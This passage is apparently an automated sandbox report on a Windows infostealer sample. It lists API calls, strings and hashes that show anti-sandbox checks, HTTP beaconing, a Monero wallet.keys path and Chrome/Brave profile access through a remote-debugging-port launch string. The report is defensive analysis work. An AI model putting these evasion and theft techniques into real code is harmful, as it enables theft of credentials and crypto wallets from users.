                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                              • String ID:
                              • API String ID: 941982115-0
                              • Opcode ID: 8ba99d6cb5ddda484e4da6255355945efbed0162effe826cd370a3deb993298b
                              • Instruction ID: 83941125082d73453bb4eb0185b76705b71027e7f67f0f06be06695073ac49e6
                              • Opcode Fuzzy Hash: 8ba99d6cb5ddda484e4da6255355945efbed0162effe826cd370a3deb993298b
                              • Instruction Fuzzy Hash: A2F08930648209AFEB04BBA0EC2ABBE3376BF54705F11451BF512953D0CBBC5501C65E
                              Function 004C4800 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004C4889
                              • InternetCrackUrlA.WININET(00000000,00000000), ref: 004C4899
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CrackInternetlstrlen
                              • String ID: <
                              • API String ID: 1274457161-4251816714
                              • Opcode ID: 4a6fbf3e10695cf58d071060c52e5e09db6249c59785839e7f9973881358e154
                              • Instruction ID: 710767674239f406250e588df025948a3fe9bb8381c05a65ad80721528dfcf80
                              • Opcode Fuzzy Hash: 4a6fbf3e10695cf58d071060c52e5e09db6249c59785839e7f9973881358e154
                              • Instruction Fuzzy Hash: 21214FB1D00208ABDF14DFA5E845BDD7B75FB45320F10862AF915A72D0DB746A05CF91
                              Function 004D5440 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                                • Part of subcall function 004DAAB0: lstrcpy.KERNEL32(?,00000000), ref: 004DAAF6
                                • Part of subcall function 004C62D0: InternetOpenA.WININET(004E0DFF,00000001,00000000,00000000,00000000), ref: 004C6331
                                • Part of subcall function 004C62D0: StrCmpCA.SHLWAPI(?,012AE8D8), ref: 004C6353
                                • Part of subcall function 004C62D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004C6385
                                • Part of subcall function 004C62D0: HttpOpenRequestA.WININET(00000000,GET,?,012AE0E0,00000000,00000000,00400100,00000000), ref: 004C63D5
                                • Part of subcall function 004C62D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004C640F
                                • Part of subcall function 004C62D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004C6421
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004D5478
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                              • String ID: ERROR$ERROR
                              • API String ID: 3287882509-2579291623
                              • Opcode ID: 9faad4b4227edac98a01de3f0a46344e86a384640832c84dcecdb2768ea01239
                              • Instruction ID: 21d612362020b0c846f1f3cf5e8875c6f0d68a52dea046de549b9fede457c04a
                              • Opcode Fuzzy Hash: 9faad4b4227edac98a01de3f0a46344e86a384640832c84dcecdb2768ea01239
                              • Instruction Fuzzy Hash: CF114F30900008AACB14FF65D876AED7379AF10344F40455FE90A466A6EF38AB15C65A
                              Function 004C1220 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1493 4c1220-4c1247 call 4d8b40 GlobalMemoryStatusEx 1496 4c1249-4c1271 call 4ddd30 * 2 1493->1496 1497 4c1273-4c127a 1493->1497 1498 4c1281-4c1285 1496->1498 1497->1498 1500 4c129a-4c129d 1498->1500 1501 4c1287 1498->1501 1503 4c1289-4c1290 1501->1503 1504 4c1292-4c1294 ExitProcess 1501->1504 1503->1500 1503->1504
                              APIs
                              • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 004C123E
                              • ExitProcess.KERNEL32 ref: 004C1294
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitGlobalMemoryProcessStatus
                              • String ID: @
                              • API String ID: 803317263-2766056989
                              • Opcode ID: 1f56d8d9bc7a65a909ce54e4be8f0002849baf047c449669cf0da34e2e4c50f5
                              • Instruction ID: 06a6ad38960ad37c3911eaf935dd60d743ddbbe9c735a40db260f9399f12b89a
                              • Opcode Fuzzy Hash: 1f56d8d9bc7a65a909ce54e4be8f0002849baf047c449669cf0da34e2e4c50f5
                              • Instruction Fuzzy Hash: 53014BB4D80308AAEF50EFE4DD4AFAEBB78AB15705F20848EE704B62D1C67C5541875D
                              Function 004D7A70 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004D7AA0
                              • RtlAllocateHeap.NTDLL(00000000), ref: 004D7AA7
                              • GetComputerNameA.KERNEL32(?,00000104), ref: 004D7ABF
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateComputerNameProcess
                              • String ID:
                              • API String ID: 1664310425-0
                              • Opcode ID: b56c89d92b0d5cbde3093c2993e14816f3b3cf1f3b28efd194873838fd361cb5
                              • Instruction ID: b11c0244aeb8252798b55efb45da9adf8af2dd116aa7d8f60894d2a4a66e901e
                              • Opcode Fuzzy Hash: b56c89d92b0d5cbde3093c2993e14816f3b3cf1f3b28efd194873838fd361cb5
                              • Instruction Fuzzy Hash: 120181B1A58249ABC704CF99DD45BAFBBB8FB04711F10426BF505E2380E7B85A00CBA5
                              Function 004C1110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 004C112B
                              • VirtualAllocExNuma.KERNEL32(00000000), ref: 004C1132
                              • ExitProcess.KERNEL32 ref: 004C1143
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$AllocCurrentExitNumaVirtual
                              • String ID:
                              • API String ID: 1103761159-0
                              • Opcode ID: beb5256bfdef267c5ea51c975d8850b2a760226f7c08bdf6318259b6fa84e64d
                              • Instruction ID: c319d739bc9f269bd6e0eafa148edee84cc956b95b4c840e7f3d505cab9ef8ad
                              • Opcode Fuzzy Hash: beb5256bfdef267c5ea51c975d8850b2a760226f7c08bdf6318259b6fa84e64d
                              • Instruction Fuzzy Hash: 9EE0867099930CFBE7545B919D0AF0D7678AB04B15F10405BF708761D0C6BC2540865C
                              Function 004C10A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                              Download Yara Rule
                              APIs
                              • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 004C10B3
                              • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 004C10F7
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Virtual$AllocFree
                              • String ID:
                              • API String ID: 2087232378-0
                              • Opcode ID: 7d36e8c33297eae9a2a14bba04c1f428a80494986cc4ffa7f79aa96063d04225
                              • Instruction ID: e8f7239ce6529aa610ea3e3d206c5877dd72b7ea11e9ff9f6e7cff857ed622c5
                              • Opcode Fuzzy Hash: 7d36e8c33297eae9a2a14bba04c1f428a80494986cc4ffa7f79aa96063d04225
                              • Instruction Fuzzy Hash: F9F0E971641208BBE71496A59C59FAFB798E705B05F30444AF500E7390D5759E00C668
                              Function 004C1190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 004D7A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 004D7AA0
                                • Part of subcall function 004D7A70: RtlAllocateHeap.NTDLL(00000000), ref: 004D7AA7
                                • Part of subcall function 004D7A70: GetComputerNameA.KERNEL32(?,00000104), ref: 004D7ABF
                                • Part of subcall function 004D79E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004C11B7), ref: 004D7A10
                                • Part of subcall function 004D79E0: RtlAllocateHeap.NTDLL(00000000), ref: 004D7A17
                                • Part of subcall function 004D79E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 004D7A2F
                              • ExitProcess.KERNEL32 ref: 004C11C6
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Process$AllocateName$ComputerExitUser
                              • String ID:
                              • API String ID: 3550813701-0
                              • Opcode ID: a78f05f22a69ea905ae9b6a0aa6ec7fe013bf8aca33d9d935de71477723401e0
                              • Instruction ID: 73447664d4ae14533b1f056c1461103620ccbb0a50a47755648d5069a644f96f
                              • Opcode Fuzzy Hash: a78f05f22a69ea905ae9b6a0aa6ec7fe013bf8aca33d9d935de71477723401e0
                              • Instruction Fuzzy Hash: EAE0ECA691420553DA1473BA6C27F2B329C5B1534EF04441FFA0482312FD2DF801816D

                              Non-executed Functions

                              Function 004CBE40 Relevance: 58.5, APIs: 26, Strings: 7, Instructions: 730fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 004DAA50: lstrcpy.KERNEL32(004E0E1A,00000000), ref: 004DAA98
                                • Part of subcall function 004DAC30: lstrcpy.KERNEL32(00000000,?), ref: 004DAC82
                                • Part of subcall function 004DAC30: lstrcat.KERNEL32(00000000), ref: 004DAC92
                                • Part of subcall function 004DACC0: lstrlen.KERNEL32(?,012A8F18,?,\Monero\wallet.keys,004E0E1A), ref: 004DACD5
                                • Part of subcall function 004DACC0: lstrcpy.KERNEL32(00000000), ref: 004DAD14
                                • Part of subcall function 004DACC0: lstrcat.KERNEL32(00000000,00000000), ref: 004DAD22
                                • Part of subcall function 004DABB0: lstrcpy.KERNEL32(?,004E0E1A), ref: 004DAC15
                              • FindFirstFileA.KERNEL32(00000000,?,004E0B32,004E0B2F,00000000,?,?,?,004E1450,004E0B2E), ref: 004CBEC5
                              • StrCmpCA.SHLWAPI(?,004E1454), ref: 004CBF33
                              • StrCmpCA.SHLWAPI(?,004E1458), ref: 004CBF49
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 004CC8A9
                              • FindClose.KERNEL32(000000FF), ref: 004CC8BB
                              Strings
                              • --remote-debugging-port=9229 --profile-directory=", xrefs: 004CC534
                              • \Brave\Preferences, xrefs: 004CC1C1
                              • --remote-debugging-port=9229 --profile-directory=", xrefs: 004CC495
                              • --remote-debugging-port=9229 --profile-directory=", xrefs: 004CC3B2
                              • Google Chrome, xrefs: 004CC6F8
                              • Preferences, xrefs: 004CC104
                              • Brave, xrefs: 004CC0E8
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$Brave$Google Chrome$Preferences$\Brave\Preferences
                              • API String ID: 3334442632-1869280968
                              • Opcode ID: 881372a9dc6031e15ac5a4c8933a0ee3433439c4459a98a7318d48aab74359b3
                              • Instruction ID: f2f283af510d3f9d70c9f8054188bfeb8b51b1bb5041d5ff0c5dd6c0a1377f64
                              • Opcode Fuzzy Hash: 881372a9dc6031e15ac5a4c8933a0ee3433439c4459a98a7318d48aab74359b3
                              • Instruction Fuzzy Hash: B25292725101089BCB14FB61DCA6FEE737DAF44304F00459FB50A66291EE38AB59CF6A
                              Function 004D3B00 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 004D3B1C
                              • FindFirstFileA.KERNEL32(?,?), ref: 004D3B33
                              • lstrcat.KERNEL32(?,?), ref: 004D3B85
                              • StrCmpCA.SHLWAPI(?,004E0F58), ref: 004D3B97
                              • StrCmpCA.SHLWAPI(?,004E0F5C), ref: 004D3BAD
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 004D3EB7
                              • FindClose.KERNEL32(000000FF), ref: 004D3ECC
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
